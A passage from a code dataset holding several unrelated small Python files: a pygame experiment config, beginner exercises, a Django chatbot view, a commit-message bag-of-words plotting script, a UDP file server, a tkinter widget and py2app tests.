INIT_NO_OF_CITIES, 2 )\n printconfig( 'INPUTS_PATH' , INPUTS_PATH, os.path.join( PKG_ROOT, 'inputs' ) )\n printconfig( 'LIVE_EXPERIMENT' , LIVE_EXPERIMENT, True )\n printconfig( 'LOBBY_PLAYERS' , LOBBY_PLAYERS, 4 )\n printconfig( 'LOBBY_TIMEOUT' , LOBBY_TIMEOUT, 300 )\n printconfig( 'MAX_ALLOCATABLE_RESOURCES' , MAX_ALLOCATABLE_RESOURCES, 10 )\n printconfig( 'MAX_INIT_RESOURCES' , MAX_INIT_RESOURCES, 6 )\n printconfig( 'MAX_INIT_SEVERITY' , MAX_INIT_SEVERITY, 5 )\n printconfig( 'MIN_ALLOCATABLE_RESOURCES' , MIN_ALLOCATABLE_RESOURCES, 0 )\n printconfig( 'MIN_INIT_RESOURCES' , MIN_INIT_RESOURCES, 3 )\n printconfig( 'MIN_INIT_SEVERITY' , MIN_INIT_SEVERITY, 2 )\n printconfig( 'MOVEMENT_REFRESH_RATE' , MOVEMENT_REFRESH_RATE, 7 )\n printconfig( 'NUM_ATTEMPTS_TO_ASSIGN_SEQ' , NUM_ATTEMPTS_TO_ASSIGN_SEQ, 8 )\n printconfig( 'NUM_BLOCKS' , NUM_BLOCKS, 8 )\n printconfig( 'NUM_MAX_TRIALS' , NUM_MAX_TRIALS, 10 )\n printconfig( 'NUM_MIN_TRIALS' , NUM_MIN_TRIALS, 3 )\n printconfig( 'NUM_PREDEFINED_CITY_COORDS' , NUM_PREDEFINED_CITY_COORDS, 25 )\n printconfig( 'NUM_SEQUENCES' , NUM_SEQUENCES, 8 )\n printconfig( 'OUTPUT_FILE_PREFIX' , OUTPUT_FILE_PREFIX, 'PES_full_' )\n printconfig( 'OUTPUTS_PATH' , OUTPUTS_PATH, os.path.join( PKG_ROOT, 'outputs' ) )\n printconfig( 'PANDEMIC_PARAMETER' , PANDEMIC_PARAMETER , 0.6 )\n printconfig( 'PLAYER_TYPE' , PLAYER_TYPE, 'human' )\n printconfig( 'PLAYBACK_ID' , PLAYBACK_ID )\n printconfig( 'RANDOM_INITIAL_SEVERITY' , RANDOM_INITIAL_SEVERITY, False )\n printconfig( 'RESPONSE_TIMEOUT' , RESPONSE_TIMEOUT, 10000 )\n printconfig( 'RESPONSE_MULTIPLIER' , RESPONSE_MULTIPLIER, 0.6 )\n printconfig( 'SAVE_INITIAL_SEVERITY_TO_FILE' , SAVE_INITIAL_SEVERITY_TO_FILE, False )\n printconfig( 'SAVE_RESULTS' , SAVE_RESULTS, True )\n printconfig( 'SEVERITY_MULTIPLIER' , SEVERITY_MULTIPLIER, 1.6 )\n printconfig( 'SHOW_BEFORE_AND_AFTER_MAP' , SHOW_BEFORE_AND_AFTER_MAP, False )\n printconfig( 'SHOW_PYGAME_IF_NONHUMAN_PLAYER' , SHOW_PYGAME_IF_NONHUMAN_PLAYER, False )\n printconfig( 'STARTING_BLOCK_INDEX' , STARTING_BLOCK_INDEX, 0 )\n printconfig( 'STARTING_SEQ_INDEX' , STARTING_SEQ_INDEX, 0 )\n printconfig( 'TOTAL_NUM_TRIALS_IN_BLOCK' , TOTAL_NUM_TRIALS_IN_BLOCK, 45 )\n printconfig( 'TRUST_MAX' , TRUST_MAX , 100 )\n printconfig( 'USE_FIXED_BLOCK_SEQUENCES' , USE_FIXED_BLOCK_SEQUENCES, True )\n printconfig( 'VERBOSE' , VERBOSE, True )\n printconfig( 'BIOSEMI_CONNECTED' , BIOSEMI_CONNECTED, False )\n printconfig( 'SEQ_LENGTHS_FILE' , SEQ_LENGTHS_FILE, 'sequence_lengths.csv' )\n printconfig( 'INITIAL_SEVERITY_FILE' , INITIAL_SEVERITY_FILE, 'initial_severity.csv' )\n\n\n# Initialise pygame engine\nif VERBOSE:\n printinfo( \"__init__: Initializing pygame engine ... \", end = '', flush = True )\n pygame.init();\n printstatus( 'Done', ANSI.GREEN )\nelse:\n pygame.init()\n\n\n# List of package variables to be made availbale to package modules\n__all__ = [\n 'PKG_ROOT',\n 'CONFIG_FILE',\n 'DOCUMENTATION_PATH',\n 'RESOURCES_PATH',\n 'VERBOSE',\n 'BIOSEMI_CONNECTED',\n 'SEQ_LENGTHS_FILE',\n 'INITIAL_SEVERITY_FILE',\n 'WHITE',\n 'YELLOW',\n 'BLACK',\n 'DARK_RED',\n 'DARK_CYAN',\n 'DARK_GREEN',\n 'GREEN',\n 'RED',\n 'GRAY',\n 'LIGHTGRAY',\n 'LIGHTBLUE',\n\n 'ANSI',\n 'printinfo',\n 'printstatus',\n 'printconfig',\n\n 'AGGREGATION_METHOD',\n 'ALLOCATION_TYPE',\n 'AVAILABLE_RESOURCES_PER_SEQUENCE',\n 'AVATAR_ICONS_SET',\n 'BLOCK_MODE_INDICES',\n 'CITY_RADIUS_REFLECTS_SEVERITY',\n 'COLORS',\n 'CONFIDENCE_TIMEOUT',\n 'CONFIDENCE_UPDATE_AMOUNT',\n 'DEBUG',\n 'DEBUG_RESOLUTION',\n 'DETECT_USER_RESOLUTION',\n 'DISPLAY_FEEDBACK',\n 'FALLBACK_RESOLUTION',\n 'FEEDBACK_SHOW_COMBINED_ALLOCATIONS',\n 'FEEDBACK_SHOW_GROUP_PERFORMANCE',\n 'FEEDBACK_SHOW_INDIVIDUAL_PERFORMANCES',\n 'FORCE_MOUSEWHEEL_SCROLL_CONFIDENCE',\n 'INIT_NO_OF_CITIES',\n 'INPUTS_PATH',\n 'LIVE_EXPERIMENT',\n 'LOBBY_PLAYERS',\n 'LOBBY_TIMEOUT',\n 'MAX_ALLOCATABLE_RESOURCES',\n 'MAX_INIT_RESOURCES',\n 'MAX_INIT_SEVERITY',\n 'MIN_ALLOCATABLE_RESOURCES',\n 'MIN_INIT_RESOURCES',\n 'MIN_INIT_SEVERITY',\n 'MOVEMENT_REFRESH_RATE',\n 'NUM_ATTEMPTS_TO_ASSIGN_SEQ',\n 'NUM_BLOCKS',\n 'NUM_MAX_TRIALS',\n 'NUM_MIN_TRIALS',\n 'NUM_PREDEFINED_CITY_COORDS',\n 'NUM_SEQUENCES',\n 'OUTPUT_FILE_PREFIX',\n 'OUTPUTS_PATH',\n 'PANDEMIC_PARAMETER',\n 'PLAYBACK_ID',\n 'PLAYER_TYPE',\n 'RANDOM_INITIAL_SEVERITY',\n 'RESPONSE_MULTIPLIER',\n 'RESPONSE_TIMEOUT',\n 'SAVE_INITIAL_SEVERITY_TO_FILE',\n 'SAVE_RESULTS',\n 'SEVERITY_MULTIPLIER',\n 'SHOW_BEFORE_AND_AFTER_MAP',\n 'SHOW_PYGAME_IF_NONHUMAN_PLAYER',\n 'STARTING_BLOCK_INDEX',\n 'STARTING_SEQ_INDEX',\n 'TOTAL_NUM_TRIALS_IN_BLOCK',\n 'TRUST_MAX',\n 'USE_FIXED_BLOCK_SEQUENCES'\n]\n\nif VERBOSE: print() # Just to separate initialization messages from rest of execution.\n","repo_name":"BCI-NE/PES","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":20454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34011808997","text":"# Entrada dos valores da lista\nnumbers_list = []\nwhile True:\n ele = int(input('Digite um número: '))\n if ele in numbers_list:\n print('Esse número já se encontra na lista')\n else:\n numbers_list.append(ele)\n saida = 'zerado'\n# Verificação de saída\n while saida not in 'nNsS':\n saida = str(input('Você deseja continuar? [S/N]: '))\n if saida in 'nN':\n break\n# Impressão da lista ordenada em ordem crescente\nnumbers_list.sort()\nprint(f'Lista em ordem crescente: {numbers_list}')\n\n","repo_name":"arthurtomas/Codes_git","sub_path":"desafio079.py","file_name":"desafio079.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14609992913","text":"import json\nfrom django.http import JsonResponse, Http404\nfrom .bot import Chat\nfrom django.views.decorators.csrf import csrf_exempt\n\nBAD_REQUEST = {\n 'detail': \"This request is not defined for this route\"\n}\n\n# Create your views here.\n\n\n@csrf_exempt\ndef getChatbotResponse(request):\n # django.middleware.csrf.get_token(request)\n if request.method != 'POST':\n Http404(\"\")\n return JsonResponse(BAD_REQUEST, status=404)\n else:\n inputData = json.loads(request.body)\n user = Chat()\n message = dict(inputData)['message']\n return JsonResponse(user.getChatbotResponse(message))\n","repo_name":"MyAerothonTeam/Konnex","sub_path":"ServerEnd/KonnexApi/Chatbot/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12276649180","text":"import pandas as pd\nimport csv\nfrom collections import Counter\nimport os\nimport matplotlib.pyplot as plt\nimport spacy\nimport seaborn as sns\nfrom spacy.matcher import Matcher\nfrom nltk.stem.porter import *\nimport re\nfrom nltk import ngrams\nfrom nltk.corpus import stopwords\nfrom bs4 import BeautifulSoup\n\n# Download stopwords\n# import nltk\n# nltk.download('stopwords')\n\nREPLACE_BY_SPACE_RE = re.compile('[/(){}\\[\\]\\|@,;]')\nBAD_SYMBOLS_RE = re.compile('[^0-9a-z #+_]')\nSTOPWORDS = set(stopwords.words('english'))\n# Esempio\n# path = 'final-results/awesome-docker/sprint_week_master.csv'\n# oppure path = 'data-results/sprint_week_nomerepository.csv'\n# change path all'occorrenza\npartial_path = input(\"Enter CSV Repositories: data-results/bow_sprint_week_\")\npath = \"data-results/bow_sprint_week_\" + partial_path\npath_split = path.split('/')\n\ndata_sprint = pd.read_csv(path) # prendo i dati\ndata_sprint = data_sprint[pd.notnull(data_sprint['Msg_data'])] # checking not missing msg\n\n\n#print(data_sprint.head(10))\n\ndef clean_text(text):\n text = BeautifulSoup(text, \"lxml\").text # HTML decoding\n text = text.lower() # lowercase text\n text = REPLACE_BY_SPACE_RE.sub(' ', text) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub(' ', text) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join(parola for parola in text.split() if parola not in STOPWORDS) # delete stopwords from text\n return text\n\n#print(data_sprint['Msg_data'][4])\ndata_sprint['Msg_data'] = data_sprint['Msg_data'].apply(clean_text)\n#print(data_sprint['Msg_data'][4])\n\n\n# ==============\n\n# STEMMING\nstemmer = PorterStemmer()\n\n# csv header\ncsv_headers = [\"Day\", \"Week\", \"Msg_data\"]\n\n# Salvataggio su file: stemmingbowset.csv\nwith open(\"stemmingbowset.csv\", 'w') as f:\n writer = csv.DictWriter(f, fieldnames=csv_headers)\n writer.writeheader()\n for i, line in enumerate(data_sprint['Msg_data']):\n word_str = \"\"\n for word in line.split():\n word_str += stemmer.stem(word) + \" \"\n #print(i, word_str)\n writer.writerow({'Day': data_sprint['Day'][i], 'Week': data_sprint['Week'][i], 'Msg_data': word_str})\nf.close()\n\n# ==============\n\n# Most common word\ndata_sprint = pd.read_csv(\"stemmingbowset.csv\")\n\nmsg_occurrences = []\n\nfor msg in data_sprint['Msg_data']:\n for word in msg.split():\n msg_occurrences.append(word)\n# print(msg_occurrences)\n\noccurrences = Counter(msg_occurrences)\n\n# Top 10 BoW Frequency:\ntext_box = '#Top BoW Frequency'\nconteggio = 0\nfor most_word in occurrences.most_common(20):\n if not most_word[0].isdigit() and conteggio < 11:\n text_box += '\\n' + most_word[0] + ': ' + str(most_word[1])\n conteggio += 1\n#print(text_box)\n\n# Top n-grams token:\ntokenstr = ''\nfor token in msg_occurrences:\n if not token.isdigit():\n tokenstr += token + ' '\nmost_coulpe_token = Counter(list(ngrams(tokenstr.split(), 2)))\n\n# Top 10 n-grams token:\ntext_box_pair = '#Top BoW Pair Token'\nconteggio = 0\nfor most_word in most_coulpe_token.most_common(10):\n \"\"\" if ', ' in commits_main_year_week:\n commits_main_year_week.remove(', ')\n commits_main_year_week.remove('[')\n commits_main_year_week.remove(']')\"\"\"\n text_box_pair += '\\n' + str(most_word[0]) + ': ' + str(most_word[1])\n conteggio += 1\n# print(text_box_pair)\n\n# ================\ndata_sprint = pd.read_csv(\"stemmingbowset.csv\")\nnlp = spacy.load('en_core_web_sm')\n\nm_tool = Matcher(nlp.vocab)\n\nfix = [[{\"LOWER\": \"fix\"}],\n [{\"TEXT\": {\"REGEX\": \"^fix\"}}]]\n\ntest = [[{\"LOWER\": \"test\"}],\n [{\"TEXT\": {\"REGEX\": \"^test\"}}]]\n\nbug = [[{\"LOWER\": \"bug\"}],\n [{\"TEXT\": {\"REGEX\": \"^bug\"}}]]\n\ndebug = [[{\"LOWER\": \"debug\"}],\n [{\"TEXT\": {\"REGEX\": \"^debug\"}}]]\n\nrefactoring = [[{\"LOWER\": \"refact\"}],\n [{\"TEXT\": {\"REGEX\": \"^refact\"}}]]\n\nfeature = [[{\"LOWER\": \"feature\"}],\n [{\"TEXT\": {\"REGEX\": \"^feature\"}}]]\n\ndocumentation = [[{\"LOWER\": \"documentation\"}],\n [{\"TEXT\": {\"REGEX\": \"^documentation\"}}]]\n\nm_tool.add('FIX', fix, on_match=None)\nm_tool.add('TEST', test, on_match=None)\nm_tool.add('BUG', bug, on_match=None)\nm_tool.add('DEBUG', debug, on_match=None)\nm_tool.add('REF', refactoring, on_match=None)\nm_tool.add('FEAT', feature, on_match=None)\nm_tool.add('DOC', documentation, on_match=None)\n\n# Header del csv\nfieldnam = ['Day', 'Week', 'Tag']\n\nwith open(\"finale.csv\", 'w') as f:\n writer = csv.DictWriter(f, fieldnames=fieldnam)\n writer.writeheader()\nf.close()\n\nfor index, row in data_sprint.iterrows():\n sentence = nlp(row['Msg_data'])\n phrase_matches = m_tool(sentence)\n for match_id, start, end in phrase_matches:\n string_id = nlp.vocab.strings[match_id] # Get string representation: 'FIX'\n span = sentence[start:end] # The matched span\n if span.text:\n with open(\"finale.csv\", 'a') as f:\n writer = csv.DictWriter(f, fieldnames=fieldnam)\n writer.writerow({'Day': row['Day'], 'Week': row['Week'], 'Tag': string_id})\n f.close()\n\n# -----------------------\n# bow + tag count\ndata_count = pd.read_csv('finale.csv')\n\ndata_count_head = [\"Day\", \"Week\", \"Tag\", \"#Tag\"]\n\nweek_grouped = data_count.groupby([\"Day\", \"Week\"])[\"Tag\"].value_counts()\nwith open(\"bow_tag.csv\", 'w') as f:\n writer = csv.DictWriter(f, fieldnames=data_count_head)\n writer.writeheader()\nf.close()\n\nbow = pd.DataFrame(week_grouped)\nbow.to_csv(\"bow_tag.csv\", header=False, mode=\"a\")\n\n# -----------------------\n# bow tag filter multiple tag sprint to a single tag\n\ndata_count_filter = pd.read_csv('bow_tag.csv')\n\nwith open(\"bow_tag_filter.csv\", 'w') as f:\n writer = csv.DictWriter(f, fieldnames=data_count_head)\n writer.writeheader()\n for i, line in enumerate(data_count_filter['Day']): # ciclo sui giorni\n if i == 0:\n prec = line\n max_index = i\n continue\n if prec == line: # giorni uguali con tag diversi\n # print(i, \"uguali: \", prec, \" - \", line)\n if data_count_filter['#Tag'][i - 1] < data_count_filter['#Tag'][i]:\n prec = line\n max_index = i\n else: # diversi salvo il precedente\n # print(i, \"diversi: \", prec, \" - \", line, \" salvo\")\n writer.writerow({'Day': data_count_filter['Day'][max_index], 'Week': data_count_filter['Week'][max_index],\n 'Tag': data_count_filter['Tag'][max_index], '#Tag': data_count_filter['#Tag'][max_index]})\n prec = line\n max_index = i\n\n if i == len(data_count_filter['Day']) - 1: # devo salvare l'ultimo\n # print(i, \"ultimo\")\n # if data_count_filter['Day'][i] != data_count_filter['Day'][i-1]: # se diverso dal penultimo - salvo\n writer.writerow({'Day': data_count_filter['Day'][max_index], 'Week': data_count_filter['Week'][max_index],\n 'Tag': data_count_filter['Tag'][max_index], '#Tag': data_count_filter['#Tag'][max_index]})\nf.close()\n\nos.remove('stemmingbowset.csv')\nos.remove('finale.csv')\nos.remove('bow_tag.csv')\n\n# ----------------\n# Join scrum con gli sprint derivati dal BoW tag\n\ndata_bow = pd.read_csv(\"bow_tag_filter.csv\") # prendo i dati bow\n\n# richiedo i dati del main scrum sprint\npartial_path = input(\"Enter CSV Repositories Main to join: data-results/sprint_week_\")\nmain_path = \"data-results/sprint_week_\" + partial_path\ntext_path_split = main_path.split('/')\nmain_data = pd.read_csv(main_path) # prendo i dati del branch text\n\nmain_datax = [x[:4] + \"-\" + str(y) for x, y in\n zip(main_data['Day'], main_data['Week'])] # dati nella forma anno-settimana\ndatab = [x[:4] + \"-\" + str(y) for x, y in zip(data_bow['Day'], data_bow['Week'])]\n\nsns.set() # corrisponde al plt.grid(True)\n\ndevelopment_y = []\ntest_fix_y = []\n# Determino i label da plottare\nfor indice, valore in enumerate(main_datax): # year-week\n if valore in datab: # trovata settimana analizzata sotto BoW\n if data_bow[\"Tag\"][datab.index(valore)] in ['FIX', 'TEST', 'BUG', 'DEBUG', 'REF', 'DOC']:\n test_fix_y.append(main_data['Sprint_week'][indice])\n development_y.append(0)\n else:\n test_fix_y.append(0)\n development_y.append(main_data['Sprint_week'][indice])\n else:\n test_fix_y.append(0)\n development_y.append(main_data['Sprint_week'][indice])\n\n\nplt.figure(1)\nbarlist_development = plt.bar(main_datax, development_y, label='Development')\nbarlist_test_fix = plt.bar(main_datax, test_fix_y, color='g', label='FIX-TEST-BUG-DEBUG-REF-DOC')\nplt.legend(loc='upper right')\nplt.xticks(main_datax, main_datax, rotation=90) # x\nplt.xlabel('Weekly commits') # x\nplt.ylabel('Number of changes') # y\nplt.suptitle(path_split[len(path_split) - 1], fontsize=10)\nplt.title('Sprint Weekly trend BoW', fontsize=15)\n\n# these are matplotlib.patch.Patch properties\nprops = dict(boxstyle='round,pad=0.5', facecolor='white', alpha=0.5, edgecolor='black')\n\nplt.annotate(text_box, xy=(0, 1), xytext=(12, -12), va='top', annotation_clip=False,\n xycoords='axes fraction', textcoords='offset points', bbox=props)\n# (-0.15, 1) (-0.17, 1) (0, 1)\nplt.annotate(text_box_pair, xy=(0.13, 1), xytext=(12, -12), va='top', annotation_clip=False,\n xycoords='axes fraction', textcoords='offset points', bbox=props)\n# (-0.21, 0.33) (-0.21, 0.33) (0.13, 1)\nplt.show()\n\nos.remove('bow_tag_filter.csv')\n","repo_name":"Fliki1/MSR","sub_path":"Sprint_BoW_plot.py","file_name":"Sprint_BoW_plot.py","file_ext":"py","file_size_in_byte":9439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"7353198746","text":"'''\nN = int(input())\narr = list(map(int, input().split()))\nclean = 21e8\nfor i in range(N-1):\n for j in range(i+1, N):\n temp = arr[i]+arr[j]\n if clean > abs(temp):\n clean = abs(temp)\n pair = [arr[i], arr[j]]\n if clean == abs(temp):\n if abs(pair[0]) + abs(pair[1]) > abs(arr[i]) + abs(arr[j]):\n continue\n else:\n pair = [arr[i], arr[j]]\npair.sort()\nprint(*pair)\n'''\n# 강사님 풀이\n\nn = int(input())\narr = list(map(int, input().split()))\narr.sort()\n# 투 포인터 초기화\nleft = 0\nright = n-1\n# 변수 초기화\nminimum = 2e9 +1\nansleft, ansright = 0, 0\nwhile left < right:\n sum = arr[left] + arr[right] # 합 구하기\n if sum == 0:\n print(arr[left], arr[right])\n exit() # break와의 차이점: 아예 프로그램을 종료시킴\n # 절대값을 이용해서 최소 차이를 찾기\n if minimum > abs(sum):\n minimum = abs(sum)\n ansleft = left\n ansright = right\n # 합이 0보다 크면 right를 줄이고, 합이 0보다 작으면 left를 늘린다\n if sum > 0:\n right -= 1\n else:\n left += 1\nprint(arr[ansleft], arr[ansright])\n","repo_name":"defkimbyeongju/algorithm","sub_path":"sliding_twopointer/dirty_water.py","file_name":"dirty_water.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22276724185","text":"# Código que representa la aplicación servidor UDP\r\nimport socket\r\nimport time\r\nimport os\r\nimport sys\r\nimport threading\r\nfrom datetime import datetime\r\nimport time\r\n\r\n#IP = 'localhost'\r\nIP = '172.16.21.129'\r\nPORT = 7000\r\nruta_archivo = \"\"\r\nbarrier = None\r\nservidor = None\r\n\r\n\r\ndef thread_function(client_address):\r\n tName = threading.current_thread().getName()\r\n pservidor(f'El {tName} se ha conectado en el puerto {client_address[1]}')\r\n # pservidor(f'Se enviará al {tName} el archivo en la ruta: {ruta_archivo}')\r\n pservidor(f'{tName} esperando')\r\n barrier.wait()\r\n\r\n buffSize = 8192\r\n c = 0\r\n sizeS = os.stat(ruta_archivo)\r\n sizeSS = sizeS.st_size # tamaño en bytes\r\n NumS = int(sizeSS / buffSize)\r\n NumS = NumS + 1\r\n\r\n check = int(NumS)\r\n archivo = open(ruta_archivo, \"rb\")\r\n pservidor(f'Inicio de envio de paquetes al cliente {tName}')\r\n aviso = True\r\n starttime = time.time()\r\n lasttime = starttime\r\n \r\n \r\n while check != 0:\r\n paquete = archivo.read(buffSize)\r\n servidor.sendto(paquete, client_address)\r\n c += 1\r\n check -= 1\r\n porcentaje = (c/NumS)*100 // 1\r\n if porcentaje == 50 and aviso == True:\r\n pservidor(f'Se han enviado {porcentaje}% paquetes al cliente {tName}')\r\n aviso = False\r\n \r\n laptime = round((time.time() - lasttime), 2) \r\n pservidor(f'Todo los paquetes enviados a {tName}')\r\n archivo.close()\r\n \r\n now = datetime.today()\r\n ruta = f'Logs/S-{tName}-{now.year}-{now.month}-{now.day}-{now.hour}-{now.minute}-{now.second}.txt'\r\n file = open(ruta, \"w\")\r\n file.write(f'Nombre del archivo: {ruta_archivo[-9:]}\\nTamaño: {ruta_archivo[-9:-4]}\\nCliente: {tName}\\nTiempo: {laptime}')\r\n file.close()\r\n \r\n\r\ndef pservidor(msj):\r\n print(f\"[SERVIDOR] {msj}\")\r\n\r\n\r\ndef main():\r\n # CONFIGURACIÓN DE LA APLICACIÓN SERVIDOR\r\n global ruta_archivo\r\n global barrier\r\n global servidor\r\n # Definir con cuál archivo se trabajará\r\n res_archivo = input('¿Cual archivo desea recibir sus clientes?\\n[1] 100 MB\\n[2] 250 MB\\n')\r\n # if para establecer la ruta\r\n if int(res_archivo) == 1:\r\n ruta_archivo = \"archivos_servidor/100MB.txt\"\r\n\r\n elif int(res_archivo) == 2:\r\n ruta_archivo = \"archivos_servidor/250MB.txt\"\r\n else:\r\n ruta_archivo = \"archivos_servidor/prueba.txt\"\r\n\r\n\r\n # Cuántos clientes se manejaran\r\n num_clientes = int(input('¿Cuántos clientes quiere conectados?\\nOpciones válidas: 1,5,10\\n'))\r\n\r\n barrier = threading.Barrier(num_clientes)\r\n size = os.stat(ruta_archivo)\r\n sizeSS = size.st_size\r\n pservidor(f'Tamaño del archivo en bytes: {str(sizeSS)}')\r\n pservidor(f'El número de paquetes serán: {sizeSS/64000}')\r\n\r\n # CREACIÓN E INICIALIZACIÓN DEL SERVIDOR\r\n servidor = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n pservidor('Inicializado')\r\n servidor.bind((IP, PORT))\r\n pservidor('Esperando conexiones')\r\n data = servidor.recvfrom(1024)\r\n\r\n info = data[0].decode('utf-8')\r\n\r\n if info == \"CONFIG\":\r\n pservidor('Se ha recibido la solicitud para configurar la aplicación CLIENTE')\r\n servidor.sendto(f'{ruta_archivo}@{num_clientes}@{sizeSS}'.encode('utf-8'),data[1])\r\n pservidor(f'Se ha enviado la información para configurar la aplicación CLIENTE a través de: {data[1]}')\r\n else:\r\n pservidor(f'No se ha recibido la información correcta\\nSe ha recibido: {data}')\r\n\r\n # FIN CONFIGURACIÓN DE LA APLICACIÓN SERVIDOR\r\n\r\n i = 1\r\n while True:\r\n data, client_address = servidor.recvfrom(1024)\r\n cliente = threading.Thread(target=thread_function, name=\"Cliente \"+str(i),args=(client_address,))\r\n cliente.start()\r\n i=i+1\r\n\r\n\r\n servidor.close()\r\n #pservidor('Conexiones cerradas')\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"drincon1/Lab3-2","sub_path":"servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35568353286","text":"import tkinter as tk\n\n\nclass VerticalScrolledFrame(tk.Frame):\n \"\"\"\n Adapted from https://stackoverflow.com/questions/16188420/tkinter-scrollbar-for-frame\n \"\"\"\n\n def __init__(self, parent, *args, **kw):\n super().__init__(parent, *args, **kw)\n\n # create a canvas object and a vertical scrollbar for scrolling it\n v_scrollbar = tk.Scrollbar(self, orient=tk.VERTICAL)\n v_scrollbar.pack(fill=tk.Y, side=tk.RIGHT, expand=tk.FALSE)\n canvas = tk.Canvas(self, bd=0, highlightthickness=0,\n yscrollcommand=v_scrollbar.set)\n self.canvas = canvas\n canvas.pack(side=tk.LEFT, fill=tk.BOTH, expand=tk.TRUE)\n v_scrollbar.config(command=canvas.yview)\n\n # reset the view\n canvas.xview_moveto(0)\n canvas.yview_moveto(0)\n\n # create a frame inside the canvas which will be scrolled with it\n self.interior = interior = tk.Frame(canvas)\n interior_id = canvas.create_window(0, 0, window=interior,\n anchor=tk.NW)\n\n # track changes to the canvas and frame width and sync them,\n # also updating the scrollbar\n def _configure_interior(_event):\n # update the scrollbars to match the size of the inner frame\n canvas.config(scrollregion=(0, 0, interior.winfo_reqwidth(), interior.winfo_reqheight()))\n if interior.winfo_reqwidth() != canvas.winfo_width():\n # update the canvas's width to fit the inner frame\n canvas.config(width=interior.winfo_reqwidth())\n\n interior.bind('', _configure_interior)\n\n def _configure_canvas(_event):\n if interior.winfo_reqwidth() != canvas.winfo_width():\n # update the inner frame's width to fill the canvas\n canvas.itemconfigure(interior_id, width=canvas.winfo_width())\n\n canvas.bind('', _configure_canvas)\n\n def _on_mousewheel(event):\n canvas.yview_scroll(int(-1 * (event.delta / 120)), \"units\")\n\n interior.bind(\"\", lambda event: canvas.bind_all(\"\", _on_mousewheel))\n interior.bind(\"\", lambda event: canvas.unbind_all(\"\"))\n\n def scroll_to_end(self):\n self.canvas.yview_moveto(1)\n","repo_name":"olisolomons/rent_manager.py","sub_path":"src/tk_utils/vertical_scrolled_frame.py","file_name":"vertical_scrolled_frame.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36243497393","text":"import os\nimport plistlib\nimport shutil\nimport subprocess\nimport sys\nimport time\nimport unittest\n\nimport py2app\n\nfrom .tools import kill_child_processes\n\nDIR_NAME = os.path.dirname(os.path.abspath(__file__))\n\n\nclass TestBasicApp(unittest.TestCase):\n py2app_args = []\n app_dir = os.path.join(DIR_NAME, \"app_with_data\")\n\n # Basic setup code\n #\n # The code in this block needs to be moved to\n # a base-class.\n @classmethod\n def setUpClass(cls):\n kill_child_processes()\n\n env = os.environ.copy()\n pp = os.path.dirname(os.path.dirname(py2app.__file__))\n if \"PYTHONPATH\" in env:\n env[\"PYTHONPATH\"] = pp + \":\" + env[\"PYTHONPATH\"]\n else:\n env[\"PYTHONPATH\"] = pp\n\n p = subprocess.Popen(\n [sys.executable, \"setup.py\", \"py2app\"] + cls.py2app_args,\n cwd=cls.app_dir,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n close_fds=False,\n env=env,\n )\n lines = p.communicate()[0]\n if p.wait() != 0:\n print(lines)\n raise AssertionError(\"Creating basic_app bundle failed\")\n\n @classmethod\n def tearDownClass(cls):\n if os.path.exists(os.path.join(cls.app_dir, \"build\")):\n shutil.rmtree(os.path.join(cls.app_dir, \"build\"))\n\n if os.path.exists(os.path.join(cls.app_dir, \"dist\")):\n shutil.rmtree(os.path.join(cls.app_dir, \"dist\"))\n\n time.sleep(2)\n\n def assertContentsEqual(self, src_file, dst_file):\n fp = open(src_file, \"rb\")\n src_data = fp.read()\n fp.close()\n\n fp = open(dst_file, \"rb\")\n dst_data = fp.read()\n fp.close()\n\n self.assertEqual(src_data, dst_data)\n\n def test_icon_file(self):\n resource_dir = os.path.join(\n self.app_dir, \"dist\", \"SimpleApp.app\", \"Contents\", \"Resources\"\n )\n\n with open(os.path.join(resource_dir, \"..\", \"Info.plist\"), \"rb\") as fp:\n if hasattr(plistlib, \"load\"):\n pl = plistlib.load(fp)\n else:\n pl = plistlib.readPlist(fp)\n\n self.assertEqual(pl[\"CFBundleIconFile\"], \"main.icns\")\n\n src_file = os.path.join(self.app_dir, \"main.icns\")\n dst_file = os.path.join(resource_dir, \"main.icns\")\n self.assertTrue(os.path.exists(dst_file))\n\n self.assertContentsEqual(src_file, dst_file)\n\n if \"--alias\" in self.py2app_args:\n self.assertTrue(os.path.islink(dst_file))\n\n def test_resources(self):\n resource_dir = os.path.join(\n self.app_dir, \"dist\", \"SimpleApp.app\", \"Contents\", \"Resources\"\n )\n\n src_file = os.path.join(self.app_dir, \"data3\", \"source.c\")\n dst_file = os.path.join(resource_dir, \"source.c\")\n\n self.assertTrue(os.path.exists(dst_file))\n\n self.assertContentsEqual(src_file, dst_file)\n\n if \"--alias\" in self.py2app_args:\n self.assertTrue(os.path.islink(dst_file))\n\n def test_executable_resource(self):\n resource_dir = os.path.join(\n self.app_dir, \"dist\", \"SimpleApp.app\", \"Contents\", \"Resources\"\n )\n src_file = os.path.join(self.app_dir, \"data1\", \"file3.sh\")\n dst_file = os.path.join(resource_dir, \"sub1\", \"file3.sh\")\n\n src_st = os.stat(src_file)\n dst_st = os.stat(dst_file)\n\n self.assertEqual(\n src_st.st_mode,\n dst_st.st_mode,\n f\"{src_st.st_mode:o} != {dst_st.st_mode:o}\",\n )\n\n def test_data_files(self):\n resource_dir = os.path.join(\n self.app_dir, \"dist\", \"SimpleApp.app\", 